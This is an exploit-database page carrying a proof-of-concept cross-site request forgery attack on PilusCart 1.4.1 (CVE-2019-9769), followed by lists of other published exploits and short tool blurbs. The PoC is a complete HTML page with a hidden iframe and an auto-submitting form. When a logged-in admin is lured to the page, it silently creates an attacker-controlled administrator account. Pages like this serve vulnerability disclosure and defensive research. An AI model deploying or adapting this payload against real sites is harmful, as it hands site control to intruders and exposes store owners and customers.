Menu

Search for hundreds of thousands of exploits

"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)"

Author

Exploit author

"Gionathan Reale"

Platform

Exploit platform

php

Release date

Exploit published date

2019-03-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Exploit Title: PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 10-03-2019
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://github.com/piluscart
# Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
# Version: 1.4.1
# Tested on: ParrotOS
# CVE : 2019-9769

PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.


PoC:


<html>
<iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<form name="adduser" action="http://server/cabin/index.php?module=users&action=newUser" method="post" target="csrf-frame">
    <input type="submit">
    <input type="hidden" name="admin_id" value="">
    <input type="hidden" name="session_id" value="">
    <input type="hidden" name="admin_login" value="attacker">
    <input type="hidden" name="admin_fullname" value="attacker">
    <input type="hidden" name="admin_email" value="admin@attacker.com">
    <input type="hidden" name="admin_pass" value="admin">
    <input type="hidden" name="confirm_pass" value="admin">
    <input type="hidden" name="admin_level" value="admin">
    <input type="hidden" name="admin_url" value="">
    <input type="hidden" name="saveAdmin" value="Simpan">
        
</form>

<script>
document.forms.adduser.submit();
</script>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-03-21 "Canarytokens 2019-03-01 - Detection Bypass" dos windows "Gionathan Reale"
2019-03-15 "Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities" webapps php "Gionathan Reale"
2019-03-13 "pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting" webapps php "Gionathan Reale"
2019-03-12 "PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)" webapps php "Gionathan Reale"
2018-12-11 "LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)" dos windows "Gionathan Reale"
2018-12-09 "Textpad 8.1.2 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-26 "TransMac 12.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-26 "CrossFont 7.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-25 "Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-17 "XAMPP Control Panel 3.2.2 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-14 "InfraRecorder 0.53 - '.txt' Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-14 "Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-14 "Faleemi Plus 1.0.2 - Denial of Service (PoC)" dos windows_x86-64 "Gionathan Reale"
2018-09-13 "Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-09-13 "Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)" local windows "Gionathan Reale"
2018-09-12 "jiNa OCR Image to Text 1.0 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "PixGPS 1.1.8 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "RoboImport 1.2.0.72 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "iCash 7.6.5 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-12 "PicaJet FX 2.6.5 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-12 "PDF Explorer 1.5.66.2 - Denial of Service (PoC)" dos windows "Gionathan Reale"
2018-09-10 "Zenmap (Nmap) 7.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-09-07 "iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)" local windows_x86 "Gionathan Reale"
2018-08-29 "HD Tune Pro 5.70 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Fathom 2.4 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Immunity Debugger 1.85 - Denial of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Easy PhotoResQ 1.0 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-29 "Drive Power Manager 1.10 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-08-23 "StyleWriter 4 1.0 - Denial of Service (PoC)" local windows_x86 "Gionathan Reale"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.